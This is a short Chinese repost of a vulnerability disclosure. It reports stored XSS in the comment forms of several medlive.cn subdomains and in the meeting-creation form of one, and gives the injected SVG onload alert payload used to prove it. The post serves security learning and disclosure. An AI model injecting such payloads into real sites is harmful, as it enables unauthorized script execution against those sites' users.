【漏洞学习——XSS】医脉通评论+新建会议处XSS
生活随笔
收集整理的這篇文章主要介紹了
【漏洞学习——XSS】医脉通评论+新建会议处XSS
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
存儲型XSS
醫脈通多站點存在XSS漏洞
1、http://ecases.medlive.cn/
在發布評論處插入"/><svg οnlοad=alert(/1/)>?
2、http://co-diovan.medlive.cn/
3.http://pua.medlive.cn/
4.http://meetings.medlive.cn/ 這個是在發布會議處存在。
參見:https://bugs.shuimugan.com/bug/view?bug_no=154305
總結
以上是生活随笔為你收集整理的【漏洞学习——XSS】医脉通评论+新建会议处XSS的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 计算机图文混排三笔记,Markdown,
- 下一篇: divi模板下载_优雅主题的Divi 3